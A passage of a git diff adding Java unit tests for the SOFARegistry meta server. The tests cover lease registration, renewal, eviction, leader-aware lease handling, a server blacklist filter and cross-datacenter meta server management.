Lease<>(new DataNode(sample.getNodeUrl(), getDc()), 1, TimeUnit.MILLISECONDS); + Lease lease4 = lease2; + lease4.setRenewal(lease3.getRenewal()); + + Assert.assertNotEquals(lease1, lease2); + Assert.assertNotEquals(lease2, lease3); + Assert.assertEquals(lease2, lease4); + Assert.assertNotEquals(lease2.hashCode(), lease3.hashCode()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManagerTest.java new file mode 100644 index 000000000..0734b7619 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManagerTest.java @@ -0,0 +1,129 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.data; + +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.monitor.data.DataServerStats; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultDataServerManagerTest extends AbstractMetaServerTestBase { + + private DefaultDataServerManager dataServerManager; + + @Mock private MetaServerConfig metaServerConfig; + + @Before + public void beforeDefaultdataServerManagerTest() throws Exception { + MockitoAnnotations.initMocks(this); + makeMetaLeader(); + dataServerManager = new DefaultDataServerManager(metaServerConfig, metaLeaderService); + dataServerManager.setMetaServerConfig(metaServerConfig).setSlotManager(new SimpleSlotManager()); + when(metaServerConfig.getExpireCheckIntervalMillis()).thenReturn(60); + } + + @After + public void afterDefaultdataServerManagerTest() throws Exception { + dataServerManager.preDestory(); + } + + @Test + public void testGetEpoch() { + Assert.assertEquals(0, dataServerManager.getEpoch()); + dataServerManager.renew(new DataNode(randomURL(randomIp()), getDc()), 1000); + dataServerManager.renew(new DataNode(randomURL(randomIp()), getDc()), 1000); + Assert.assertNotEquals(0, dataServerManager.getEpoch()); + } + + @Test + public void testIsLeaderGetClusterMembers() throws Exception { + dataServerManager.postConstruct(); + DataNode node = new DataNode(randomURL(randomIp()), getDc()); + dataServerManager.renew(node, 1); + Assert.assertTrue(dataServerManager.getDataServerMetaInfo().getEpoch() > 0); + Assert.assertFalse(dataServerManager.getDataServerMetaInfo().getClusterMembers().isEmpty()); + Assert.assertEquals(1, dataServerManager.getDataServerMetaInfo().getClusterMembers().size()); + Assert.assertEquals(node, dataServerManager.getDataServerMetaInfo().getClusterMembers().get(0)); + } + + @Test + public void testEvitTime() { + Assert.assertEquals(60, dataServerManager.getEvictBetweenMilli()); + } + + @Test + public void testGetDataServersStats() { + DataNode dataNode = new DataNode(randomURL(randomIp()), getDc()); + List dataNodes = randomDataNodes(2); + dataNodes.add(dataNode); + SlotTable slotTable = randomSlotTable(dataNodes); + List slotStatuses = Lists.newArrayList(); + HeartbeatRequest heartbeat = + new HeartbeatRequest<>( + dataNode, + slotTable.getEpoch(), + getDc(), + System.currentTimeMillis(), + SlotConfig.slotBasicInfo(), + slotStatuses) + .setSlotTable(slotTable); + dataServerManager.onHeartbeat(heartbeat); + List dataServerStats = dataServerManager.getDataServersStats(); + Assert.assertFalse(dataServerStats.isEmpty()); + } + + @Test + public void testCancel() throws TimeoutException, InterruptedException { + makeMetaLeader(); + List dataNodes = randomDataNodes(10); + for (DataNode dataNode : dataNodes) { + dataServerManager.renew(dataNode, 1000); + } + NotifyObserversCounter counter = new NotifyObserversCounter(); + dataServerManager.addObserver(counter); + dataServerManager.cancel(dataServerManager.getLease(dataNodes.get(0))); + Assert.assertEquals(1, counter.getCounter()); + } + + @Test + public void testRegister() throws TimeoutException, InterruptedException { + NotifyObserversCounter counter = new NotifyObserversCounter(); + dataServerManager.addObserver(counter); + makeMetaLeader(); + List dataNodes = randomDataNodes(10); + for (DataNode dataNode : dataNodes) { + dataServerManager.renew(dataNode, 1000); + } + Assert.assertEquals(10, counter.getCounter()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultRegistryForbiddenServerManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultRegistryForbiddenServerManagerTest.java new file mode 100644 index 000000000..90f94d1fb --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/filter/DefaultRegistryForbiddenServerManagerTest.java @@ -0,0 +1,69 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.filter; + +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeModifiedTest; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class DefaultRegistryForbiddenServerManagerTest extends AbstractMetaServerTestBase { + + private RegistryForbiddenServerManager registryForbiddenServerManager; + + private ProvideDataService provideDataService; + + @Before + public void beforeDefaultRegistryForbiddenServerManagerTest() { + provideDataService = spy(new InMemoryProvideDataRepo()); + registryForbiddenServerManager = new DefaultForbiddenServerManager(provideDataService); + } + + @Test + public void testNormalCase() { + registryForbiddenServerManager.addToBlacklist("127.0.0.1"); + Assert.assertFalse( + registryForbiddenServerManager.allowSelect( + new Lease<>(new NodeModifiedTest.SimpleNode("127.0.0.1"), System.currentTimeMillis()))); + registryForbiddenServerManager.removeFromBlacklist("127.0.0.1"); + Assert.assertTrue( + registryForbiddenServerManager.allowSelect( + new Lease<>(new NodeModifiedTest.SimpleNode("127.0.0.1"), System.currentTimeMillis()))); + } + + @Test(expected = SofaRegistryRuntimeException.class) + public void testException() { + Assert.assertTrue( + registryForbiddenServerManager.allowSelect( + new Lease<>(new NodeModifiedTest.SimpleNode("127.0.0.1"), System.currentTimeMillis()))); + provideDataService = mock(ProvideDataService.class); + when(provideDataService.queryProvideData(anyString())) + .thenThrow(new SofaRegistryRuntimeException("expected io exception")); + registryForbiddenServerManager = new DefaultForbiddenServerManager(provideDataService); + Assert.assertTrue( + registryForbiddenServerManager.allowSelect( + new Lease<>(new NodeModifiedTest.SimpleNode("127.0.0.1"), System.currentTimeMillis()))); + registryForbiddenServerManager.addToBlacklist("127.0.0.1"); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManagerTest.java new file mode 100644 index 000000000..9cbc1b494 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/AbstractEvictableFilterableLeaseManagerTest.java @@ -0,0 +1,88 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.LeaseFilter; +import com.alipay.sofa.registry.server.meta.lease.filter.DefaultForbiddenServerManager; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class AbstractEvictableFilterableLeaseManagerTest extends AbstractMetaServerTestBase { + + private AbstractEvictableFilterableLeaseManager leaseManager; + + private DefaultForbiddenServerManager forbiddenServerManager = + new DefaultForbiddenServerManager(new InMemoryProvideDataRepo()); + + @Before + public void beforeAbstractEvictableFilterableLeaseManagerTest() + throws TimeoutException, InterruptedException { + leaseManager = + new AbstractEvictableFilterableLeaseManager() { + @Override + protected int getEvictBetweenMilli() { + return 10; + } + + @Override + protected int getIntervalMilli() { + return 1000; + } + }; + leaseManager.metaLeaderService = metaLeaderService; + leaseManager.setLeaseFilters(Lists.newArrayList(forbiddenServerManager)); + makeMetaLeader(); + } + + @Test + public void testGetLeaseMeta() { + int nodeNum = 100; + for (int i = 0; i < nodeNum; i++) { + leaseManager.renew(new SimpleNode(randomIp()), 100); + } + SimpleNode node = new SimpleNode(randomIp()); + leaseManager.renew(node, 100); + Assert.assertEquals(nodeNum + 1, leaseManager.getLeaseMeta().getClusterMembers().size()); + forbiddenServerManager.addToBlacklist(node.getNodeUrl().getIpAddress()); + Assert.assertEquals(nodeNum, leaseManager.getLeaseMeta().getClusterMembers().size()); + } + + @Test + public void testFilterOut() { + int nodeNum = 100; + for (int i = 1; i < nodeNum; i++) { + leaseManager.renew(new SimpleNode("10.0.0." + i), 100); + } + leaseManager.renew(new SimpleNode("127.0.0.1"), 100); + List leases = + leaseManager.filterOut( + Lists.newArrayList(leaseManager.localRepo.values()), + new LeaseFilter() { + @Override + public boolean allowSelect(Lease lease) { + return !lease.getRenewal().getNodeUrl().getIpAddress().startsWith("10.0.0"); + } + }); + Assert.assertEquals(1, leases.size()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/CrossDcMetaServerManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/CrossDcMetaServerManagerTest.java new file mode 100644 index 000000000..925f41659 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/CrossDcMetaServerManagerTest.java @@ -0,0 +1,156 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.metaserver.CrossDcMetaServer; +import com.google.common.collect.ImmutableMap; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.assertj.core.util.Sets; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class CrossDcMetaServerManagerTest extends AbstractMetaServerTestBase { + + private DefaultCrossDcMetaServerManager crossDcMetaServerManager; + + @Mock private NodeConfig nodeConfig; + + @Mock private MetaServerConfig metaServerConfig; + + @Mock private Exchange boltExchange; + + @Before + public void beforeCrossDcMetaServerManagerTest() { + MockitoAnnotations.initMocks(this); + crossDcMetaServerManager = + new DefaultCrossDcMetaServerManager() + .setMetaServerConfig(metaServerConfig) + .setExchange(boltExchange) + .setExecutors(executors) + .setNodeConfig(nodeConfig) + .setScheduled(scheduled); + when(metaServerConfig.getCrossDcMetaSyncIntervalMillis()).thenReturn(10000); + } + + @After + public void afterCrossDcMetaServerManagerTest() throws Exception { + crossDcMetaServerManager.preDestory(); + } + + @Test + public void testGetOrCreate() throws InterruptedException { + int tasks = 100; + when(nodeConfig.getDataCenterMetaServers(getDc())) + .thenReturn(Sets.newLinkedHashSet(randomIp(), randomIp(), randomIp())); + CountDownLatch latch = new CountDownLatch(tasks); + CyclicBarrier barrier = new CyclicBarrier(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + } catch (Exception ignore) { + } + crossDcMetaServerManager.getOrCreate(getDc()); + latch.countDown(); + } + }); + } + latch.await(); + Assert.assertEquals(1, crossDcMetaServerManager.getCrossDcMetaServers().size()); + Assert.assertTrue(crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().canStart()); + Assert.assertTrue( + crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isInitialized()); + } + + @Test + public void testRemove() {} + + @Test + public void testIsLeader() throws Exception { + when(nodeConfig.getDataCenterMetaServers(getDc())) + .thenReturn(Sets.newLinkedHashSet(randomIp(), randomIp(), randomIp())); + when(nodeConfig.getMetaNodeIP()) + .thenReturn( + ImmutableMap.of( + getDc(), + Lists.newArrayList(randomIp(), randomIp(), randomIp()), + "dc2", + Lists.newArrayList(randomIp(), randomIp(), randomIp()), + "dc3", + Lists.newArrayList(randomIp(), randomIp(), randomIp()))); + crossDcMetaServerManager.postConstruct(); + crossDcMetaServerManager.becomeLeader(); + waitConditionUntilTimeOut( + () -> crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isStarted(), 1000); + // wait for concurrent modification + Thread.sleep(10); + Assert.assertTrue( + crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isStarted()); + for (CrossDcMetaServer metaServer : crossDcMetaServerManager.getCrossDcMetaServers().values()) { + Assert.assertTrue(metaServer.getLifecycleState().isStarted()); + } + } + + @Test + public void testNotLeader() throws InitializeException, TimeoutException, InterruptedException { + when(nodeConfig.getDataCenterMetaServers(getDc())) + .thenReturn(Sets.newLinkedHashSet(randomIp(), randomIp(), randomIp())); + when(nodeConfig.getMetaNodeIP()) + .thenReturn( + ImmutableMap.of( + getDc(), + Lists.newArrayList(randomIp(), randomIp(), randomIp()), + "dc2", + Lists.newArrayList(randomIp(), randomIp(), randomIp()), + "dc3", + Lists.newArrayList(randomIp(), randomIp(), randomIp()))); + LifecycleHelper.initializeIfPossible(crossDcMetaServerManager); + crossDcMetaServerManager.becomeLeader(); + waitConditionUntilTimeOut( + () -> crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isStarted(), 1000); + // wait for concurrent modification + Thread.sleep(10); + Assert.assertTrue( + crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isStarted()); + crossDcMetaServerManager.loseLeader(); + waitConditionUntilTimeOut( + () -> crossDcMetaServerManager.getOrCreate(getDc()).getLifecycleState().isStopped(), 1000); + // wait for concurrent modification + Thread.sleep(10); + for (CrossDcMetaServer metaServer : crossDcMetaServerManager.getCrossDcMetaServers().values()) { + Assert.assertTrue(metaServer.getLifecycleState().isStopped()); + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManagerTest.java new file mode 100644 index 000000000..d15b8ab15 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/LeaderAwareLeaseManagerTest.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import static org.junit.Assert.*; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.exception.SofaRegistryMetaLeaderException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import java.util.concurrent.TimeoutException; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class LeaderAwareLeaseManagerTest extends AbstractMetaServerTestBase { + + private LeaderAwareLeaseManager leaseManager; + + @Before + public void beforeLeaderAwareLeaseManagerTest() { + leaseManager = new LeaderAwareLeaseManager(); + leaseManager.metaLeaderService = metaLeaderService; + } + + @Test(expected = SofaRegistryMetaLeaderException.class) + public void testRegister() throws TimeoutException, InterruptedException { + makeMetaLeader(); + leaseManager.register(new Lease(new SimpleNode(randomIp()), 10)); + makeMetaNonLeader(); + leaseManager.register(new Lease(new SimpleNode(randomIp()), 10)); + } + + @Test(expected = SofaRegistryMetaLeaderException.class) + public void testCancel() throws TimeoutException, InterruptedException { + makeMetaLeader(); + leaseManager.register(new Lease(new SimpleNode(randomIp()), 10)); + makeMetaNonLeader(); + leaseManager.cancel(new Lease(new SimpleNode(randomIp()), 10)); + } + + @Test(expected = SofaRegistryMetaLeaderException.class) + public void testRenew() throws TimeoutException, InterruptedException { + makeMetaNonLeader(); + leaseManager.renew(new SimpleNode(randomIp()), 1000); + } + + @Test + public void testAmILeader() throws TimeoutException, InterruptedException { + makeMetaNonLeader(); + Assert.assertFalse(leaseManager.amILeader()); + makeMetaLeader(); + Assert.assertTrue(leaseManager.amILeader()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManagerTest.java new file mode 100644 index 000000000..fae32ef26 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/SimpleLeaseManagerTest.java @@ -0,0 +1,70 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import static org.junit.Assert.*; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class SimpleLeaseManagerTest extends AbstractMetaServerTestBase { + + private SimpleLeaseManager leaseManager; + + @Before + public void beforeSimpleLeaseManagerTest() { + leaseManager = new SimpleLeaseManager<>(); + } + + @Test + public void testRegister() { + SimpleNode node = new SimpleNode(randomIp()); + leaseManager.register(new Lease<>(node, 1000)); + Assert.assertFalse(leaseManager.localRepo.isEmpty()); + Assert.assertEquals(node, leaseManager.getLease(node).getRenewal()); + } + + @Test + public void testCancel() { + SimpleNode node = new SimpleNode(randomIp()); + leaseManager.register(new Lease<>(node, 1000)); + leaseManager.renew(new SimpleNode(node.getNodeUrl().getIpAddress()), 10); + Assert.assertEquals(node, leaseManager.getLease(node).getRenewal()); + Assert.assertEquals(1, leaseManager.localRepo.size()); + leaseManager.cancel(leaseManager.getLease(node)); + Assert.assertTrue(leaseManager.localRepo.isEmpty()); + } + + @Test + public void testRenew() { + SimpleNode node = new SimpleNode(randomIp()); + leaseManager.register(new Lease<>(node, 1000)); + leaseManager.renew(new SimpleNode(node.getNodeUrl().getIpAddress()), 10); + Assert.assertEquals(node, leaseManager.getLease(node).getRenewal()); + Assert.assertEquals(1, leaseManager.localRepo.size()); + } + + @Test + public void testRefreshEpoch() { + Assert.assertTrue(leaseManager.refreshEpoch(DatumVersionUtil.nextId())); + Assert.assertFalse(leaseManager.refreshEpoch(0L)); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractEvictableLeaseManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractEvictableLeaseManagerTest.java new file mode 100644 index 000000000..aa7d134ab --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractEvictableLeaseManagerTest.java @@ -0,0 +1,125 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.TimeoutException; +import java.util.concurrent.atomic.AtomicInteger; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author zhuchen + * @date Apr 6, 2021, 12:01:48 PM + */ +public class TestAbstractEvictableLeaseManagerTest extends AbstractMetaServerTestBase { + + private AbstractEvictableLeaseManager leaseManager; + + private AtomicInteger evictTime = new AtomicInteger(10); + + @Before + public void beforeTestAbstractEvictableLeaseManagerTest() + throws TimeoutException, InterruptedException { + makeMetaNonLeader(); + leaseManager = + new AbstractEvictableFilterableLeaseManager() { + @Override + protected int getEvictBetweenMilli() { + return evictTime.get(); + } + + @Override + protected int getIntervalMilli() { + return 60 * 1000; + } + }; + leaseManager.metaLeaderService = metaLeaderService; + } + + @Test + public void testEvict() throws TimeoutException, InterruptedException { + makeMetaLeader(); + leaseManager = spy(leaseManager); + leaseManager.register( + new Lease(new SimpleNode(randomIp()), 2, TimeUnit.MILLISECONDS)); + Thread.sleep(3); + Assert.assertFalse(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertFalse(leaseManager.getExpiredLeases().isEmpty()); + leaseManager.evict(); + Assert.assertTrue(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertTrue(leaseManager.getExpiredLeases().isEmpty()); + verify(leaseManager, atLeast(2)).refreshEpoch(anyLong()); + verify(leaseManager, atLeast(1)).cancel(any()); + } + + @Test + public void testEvictTooQuick() throws TimeoutException, InterruptedException { + makeMetaLeader(); + evictTime.set(60 * 1000); + leaseManager = spy(leaseManager); + leaseManager.register( + new Lease(new SimpleNode(randomIp()), 2, TimeUnit.MILLISECONDS)); + Thread.sleep(3); + Assert.assertFalse(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertFalse(leaseManager.getExpiredLeases().isEmpty()); + leaseManager.evict(); + Assert.assertTrue(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertTrue(leaseManager.getExpiredLeases().isEmpty()); + verify(leaseManager, atLeast(2)).refreshEpoch(anyLong()); + verify(leaseManager, atLeast(1)).cancel(any()); + + leaseManager.register( + new Lease(new SimpleNode(randomIp()), 2, TimeUnit.MILLISECONDS)); + Thread.sleep(3); + leaseManager.evict(); + Assert.assertFalse(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertFalse(leaseManager.getExpiredLeases().isEmpty()); + verify(leaseManager, atMost(1)).cancel(any()); + } + + @Test + public void testEmptyExpireEvict() throws TimeoutException, InterruptedException { + makeMetaLeader(); + evictTime.set(60 * 1000); + leaseManager = spy(leaseManager); + leaseManager.evict(); + Assert.assertTrue(leaseManager.getLeaseMeta().getClusterMembers().isEmpty()); + Assert.assertTrue(leaseManager.getExpiredLeases().isEmpty()); + verify(leaseManager, never()).refreshEpoch(anyLong()); + verify(leaseManager, never()).cancel(any()); + } + + @Test + public void testScheduledEvict() throws Exception { + makeMetaLeader(); + evictTime.set(10); + leaseManager.register( + new Lease(new SimpleNode(randomIp()), 2, TimeUnit.MILLISECONDS)); + Thread.sleep(3); + leaseManager.initialize(); + leaseManager.start(); + waitConditionUntilTimeOut(() -> leaseManager.localRepo.isEmpty(), 100); + leaseManager.stop(); + leaseManager.dispose(); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractRaftEnabledLeaseManager.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractRaftEnabledLeaseManager.java new file mode 100644 index 000000000..34986b0d2 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/lease/impl/TestAbstractRaftEnabledLeaseManager.java @@ -0,0 +1,262 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.impl; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; + +public class TestAbstractRaftEnabledLeaseManager extends AbstractMetaServerTestBase { + + private String snapshotFile = "TEST-SERVICE-ID"; + + // private final AbstractCachablePersistenceLeaseManager + // localLeaseManager = spy(new AbstractCachablePersistenceLeaseManager<>( + // snapshotFile)); + // + // private final AtomicReference> raftLeaseManager = + // new AtomicReference<>(); + // + // private final AtomicInteger evitTimeMilli = new AtomicInteger( + // 1000 * 60); + // + // private final AtomicBoolean leaderNotify = new AtomicBoolean( + // true); + // + // private AbstractRaftEnabledLeaseManager manager = new + // AbstractRaftEnabledLeaseManager() { + // @Override + // protected long getIntervalMilli() { + // return evitTimeMilli + // .get(); + // } + // + // @Override + // protected AbstractCachablePersistenceLeaseManager + // getLocalLeaseManager() { + // return localLeaseManager; + // } + // + // @Override + // protected LeaseManager getRaftLeaseManager() { + // return raftLeaseManager + // .get(); + // } + // + // @Override + // protected long getEvictBetweenMilli() { + // return evitTimeMilli + // .get(); + // } + // + // @Override + // protected boolean isRaftLeader() { + // return leaderNotify + // .get(); + // } + // }; + // + // private RaftExchanger raftExchanger; + // + // @Before + // public void beforeTestAbstractRaftEnabledLeaseManager() throws + // InitializeException, + // StartException { + // raftExchanger = mock(RaftExchanger.class); + // raftLeaseManager.set((LeaseManager) + // Proxy.newProxyInstance(Thread.currentThread() + // .getContextClassLoader(), new Class[] { LeaseManager.class }, new + // InvocationHandler() { + // @Override + // public Object invoke(Object proxy, Method method, Object[] args) throws + // Throwable { + // return method.invoke(localLeaseManager, args); + // } + // })); + // manager.setScheduled(scheduled).setExecutors(executors); + // LifecycleHelper.initializeIfPossible(manager); + // LifecycleHelper.startIfPossible(manager); + // } + // + // @After + // public void afterTestAbstractRaftEnabledLeaseManager() throws + // StopException, DisposeException { + // LifecycleHelper.stopIfPossible(manager); + // LifecycleHelper.disposeIfPossible(manager); + // } + // + // @Test + // public void testRunRaftProxy() throws Exception { + // leaderNotify.set(false); + // int size = manager.getClusterMembers().size(); + // MetaNode node = new 